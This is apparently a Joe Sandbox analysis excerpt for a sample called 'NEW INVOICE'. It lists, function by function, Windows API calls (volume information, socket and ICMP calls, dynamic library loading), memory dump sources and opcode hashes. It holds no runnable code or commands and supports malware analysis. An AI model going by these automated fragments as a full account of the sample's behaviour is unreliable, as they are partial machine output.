                                                                                    • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                    • String ID: HH
                                                                                    • API String ID: 2507767853-2761332787
                                                                                    • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                    • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                    • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                    • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                    • String ID: HH
                                                                                    • API String ID: 2507767853-2761332787
                                                                                    • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                    • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                    • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                    • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                    • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                    • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                    • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                    APIs
                                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                    • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                    • String ID: HH
                                                                                    • API String ID: 1515696956-2761332787
                                                                                    • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                    • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                    • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                    • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                    APIs
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                    • DrawMenuBar.USER32 ref: 00449828
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                    • String ID: 0
                                                                                    • API String ID: 772068139-4108050209
                                                                                    • Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                                    • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                    • Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                                    • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocTask_wcslen
                                                                                    • String ID: hkG
                                                                                    • API String ID: 2651040394-3610518997
                                                                                    • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                    • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                    • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                    • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 2574300362-1816364905
                                                                                    • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                    • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                    • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                    • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                                    • API String ID: 2574300362-58917771
                                                                                    • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                    • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                    • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                    • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                    • API String ID: 2574300362-3530519716
                                                                                    • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                    • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                    • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                    • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                                    • API String ID: 2574300362-275556492
                                                                                    • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                    • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                    • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                    • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                    • API String ID: 2574300362-3024904723
                                                                                    • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                    • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                    • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                    • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                    • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                                    • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                    • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                    • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                    • Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                    • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                    APIs
                                                                                    • __flush.LIBCMT ref: 00414630
                                                                                    • __fileno.LIBCMT ref: 00414650
                                                                                    • __locking.LIBCMT ref: 00414657
                                                                                    • __flsbuf.LIBCMT ref: 00414682
                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                    • String ID:
                                                                                    • API String ID: 3240763771-0
                                                                                    • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                    • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                    • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                    • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                    • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                    • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyVariant$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2286883814-0
                                                                                    • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                    • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                    • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                    • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                    • #21.WSOCK32 ref: 004740E0
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$socket
                                                                                    • String ID:
                                                                                    • API String ID: 1881357543-0
                                                                                    • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                    • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                    • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                    • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                    • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                    • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                    • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
